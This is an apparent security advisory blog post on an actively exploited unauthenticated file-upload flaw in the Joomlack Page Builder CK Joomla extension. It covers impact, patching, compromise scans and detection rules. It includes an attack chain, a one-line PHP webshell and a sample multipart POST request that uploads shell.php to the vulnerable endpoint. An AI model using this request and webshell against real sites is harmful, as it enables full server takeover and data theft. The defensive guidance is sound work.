Skip to main content
COSMICBYTEZLABS
NewsSecurityHOWTOsToolsTraining
StudyProjectsNewsletterHire MeAbout
Subscribe

Press Enter to search or Esc to close

News
Security
HOWTOs
Tools
Training
Study
Projects
Newsletter
Hire Me
About
RSS Feed
Reading List
Subscribe

Stay in the Loop

Get the latest security alerts, tutorials, and tech insights delivered to your inbox.

Subscribe NowFree forever. No spam.
COSMICBYTEZLABS

Your trusted source for IT intelligence, cybersecurity insights, and hands-on technical guides.

1794+ Articles
149+ Guides

CONTENT

  • Latest News
  • Security Alerts
  • HOWTOs
  • Checklists
  • Projects
  • Exam Prep

RESOURCES

  • Search
  • Browse Tags
  • Newsletter Archive
  • Reading List
  • RSS Feed

COMPANY

  • About Us
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CosmicBytez Labs. All rights reserved.

System Status: Operational
  1. Home
  2. Security
  3. CVE-2026-56290: Joomlack Page Builder Unauthenticated File Upload RCE — CISA KEV
CVE-2026-56290: Joomlack Page Builder Unauthenticated File Upload RCE — CISA KEV

Critical Security Alert

This vulnerability is actively being exploited. Immediate action is recommended.

SECURITYCRITICALCVE-2026-56290

CVE-2026-56290: Joomlack Page Builder Unauthenticated File Upload RCE — CISA KEV

A CVSS 10.0 unauthenticated arbitrary file upload vulnerability in the Joomlack Page Builder CK Joomla extension allows any remote attacker to upload a PHP webshell and achieve full server takeover. CISA added this to the Known Exploited Vulnerabilities catalog with a 3-day federal remediation deadline, confirming active in-the-wild exploitation.

Dylan H.

Security Team

July 7, 2026
6 min read

Affected Products

  • Joomlack Page Builder CK 1.0 – 3.6.0

Executive Summary

A maximum-severity unauthenticated arbitrary file upload vulnerability (CVE-2026-56290) has been discovered in the Page Builder CK extension for Joomla, developed by Joomlack (joomlack.fr). The flaw carries a CVSS v4.0 score of 10.0 and allows any unauthenticated remote attacker to upload an executable PHP file — such as a webshell — to the server, enabling complete remote code execution and full server takeover.

CVSS v4.0 Score: 10.0 (Critical) — CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:A/AU:Y/U:Red CVSS v3.1 Score: 9.8 (Critical) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

On July 7, 2026, CISA added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog and set a federal agency remediation deadline of July 10, 2026 — one of the shortest deadlines possible — confirming active exploitation in the wild. All Joomla sites running Page Builder CK should treat this as an emergency and patch immediately.


Vulnerability Overview

AttributeValue
CVE IDCVE-2026-56290
CWECWE-434 (Unrestricted Upload of File with Dangerous Type)
CVSS v4.0 Score10.0 (Critical)
CVSS v3.1 Score9.8 (Critical)
Attack VectorNetwork
Privileges RequiredNone
User InteractionNone
Exploitation StatusActively exploited in the wild (E:A)
CISA KEVYes — added July 7, 2026
Federal Remediation DeadlineJuly 10, 2026 (BOD 22-01)

Affected Versions

ExtensionAffected VersionsStatus
Joomlack Page Builder CK1.0 through 3.6.0Patch available from vendor

Technical Details

The vulnerability is classified as CWE-434 (Unrestricted Upload of File with Dangerous Type). The Page Builder CK extension exposes an upload endpoint that:

  1. Does not authenticate upload requests — no session token, API key, or credential check
  2. Does not validate or restrict file types — .php, .phtml, .php5, and other executable extensions are accepted
  3. Does not sanitize uploaded filenames — files land in a web-accessible directory with their original names intact

An attacker can exploit this by sending a crafted HTTP POST request directly to the upload endpoint with a PHP webshell payload. Once uploaded, the attacker accesses the file via a browser request to execute arbitrary PHP code in the context of the web server user.

Attack Chain

1. Attacker identifies Joomla site with Page Builder CK installed (any version 1.0–3.6.0)
2. Attacker crafts a malicious HTTP POST to the extension's upload endpoint
3. No authentication check — server accepts the request
4. PHP webshell (e.g., <?php system($_GET['cmd']); ?>) written to web-accessible path
5. Attacker navigates to uploaded file URL
6. Attacker executes arbitrary commands as the web server user
7. Full server compromise: database access, file system control, lateral movement

Minimal Proof-of-Concept (Conceptual)

POST /index.php?option=com_pagebuilderck&task=upload HTTP/1.1
Host: target.example.com
Content-Type: multipart/form-data; boundary=--boundary
 
----boundary
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream
 
<?php system($_GET['c']); ?>
----boundary--

Impact

Impact AreaDescription
Remote Code ExecutionExecute arbitrary PHP/OS commands via uploaded webshell
Full Server TakeoverWeb server user context; escalation possible depending on host config
Database CompromiseRead Joomla configuration.php for DB credentials; full data access
Persistent BackdoorUploaded files survive Joomla updates; require manual removal
Data ExfiltrationAll site content, user PII, credentials accessible
Lateral MovementPivot to other sites on shared hosting; internal network reconnaissance
Malware DistributionServe drive-by malware or phishing content to site visitors

The E:A (Exploitation Active) modifier in the CVSS v4.0 vector and the 3-day federal remediation window confirm that this vulnerability is being weaponized at scale right now.


Remediation

Step 1: Apply the Vendor Patch Immediately

A security patch is available from the Joomlack vendor forum at joomlack.fr. Update Page Builder CK to the patched release as soon as possible.

# Via Joomla Extensions Manager (admin panel):
# Extensions > Manage > Update
# Or manually download the patched package from joomlack.fr and install via Upload Package File

Step 2: Scan for Existing Compromise

The active exploitation status means your site may already be compromised if you were running an affected version. Scan immediately:

# Find recently created/modified PHP files in web-accessible directories
find /path/to/joomla/ -name "*.php" -newer /path/to/joomla/configuration.php -type f | grep -v cache
 
# Check for common webshell signatures in Page Builder CK directories
grep -rl "system\s*(\$_" /path/to/joomla/components/com_pagebuilderck/
grep -rl "eval\s*(base64_decode" /path/to/joomla/
 
# Check for POST requests to the upload endpoint in access logs
grep -i "pagebuilderck.*upload\|upload.*pagebuilderck" /var/log/apache2/access.log
grep -i "pagebuilderck.*upload\|upload.*pagebuilderck" /var/log/nginx/access.log

Step 3: If Immediate Patching Is Not Possible

  1. Disable the Page Builder CK extension immediately via Joomla Extensions Manager
  2. Block access to the upload endpoint at the web server or WAF level:
    location ~* /index\.php.*pagebuilderck.*upload {
        deny all;
        return 403;
    }
  3. Set upload directories to non-executable if extension must remain active temporarily
  4. Monitor access logs continuously for POST requests to Page Builder CK endpoints

Detection Indicators

IndicatorDescription
POST requests to Page Builder CK upload endpointsDirect exploitation attempts
New .php files in Joomla component directoriesUploaded webshells
HTTP access to unexpected .php files in media/upload pathsAttacker triggering webshell
Outbound connections from web server to unknown hostsPost-exploitation C2 or data exfiltration
Unusual database queries or admin account creationPost-compromise persistence activity

CISA KEV Context

CISA's Known Exploited Vulnerabilities catalog addition represents the U.S. government's highest-urgency public disclosure for active threats. Under Binding Operational Directive 22-01, all U.S. federal civilian agencies must remediate KEV-listed vulnerabilities by the specified deadline — in this case, July 10, 2026. While the directive applies to federal agencies, CISA strongly urges private sector organizations to treat KEV entries with equivalent urgency given the confirmed active exploitation.


References

  • NVD — CVE-2026-56290
  • CISA Known Exploited Vulnerabilities Catalog
  • Joomlack — Page Builder CK Extension
  • CISA BOD 22-01 — Reducing the Significant Risk of Known Exploited Vulnerabilities
#CVE-2026-56290#Joomla#Joomlack#RCE#File Upload#CISA KEV#Unauthenticated#Critical

Related Articles

CVE-2026-54414: FileRise Path Traversal Enables Arbitrary File Write and Admin Takeover

A critical path traversal vulnerability in FileRise before 3.16.0 allows unauthenticated attackers to write arbitrary files and completely compromise...

5 min read

CVE-2026-48907: Joomla Content Editor Unauthenticated PHP Upload Flaw

A maximum-severity improper access control flaw in Widget Factory's Joomla Content Editor allows unauthenticated attackers to upload and execute arbitrary...

6 min read

CVE-2026-11839: Unrestricted File Upload Enables Web Shell Deployment in Rotaban

A critical unrestricted file upload vulnerability in the Rotaban platform by Basarsoft Information Technologies allows authenticated attackers to upload...

4 min read
Back to all Security Alerts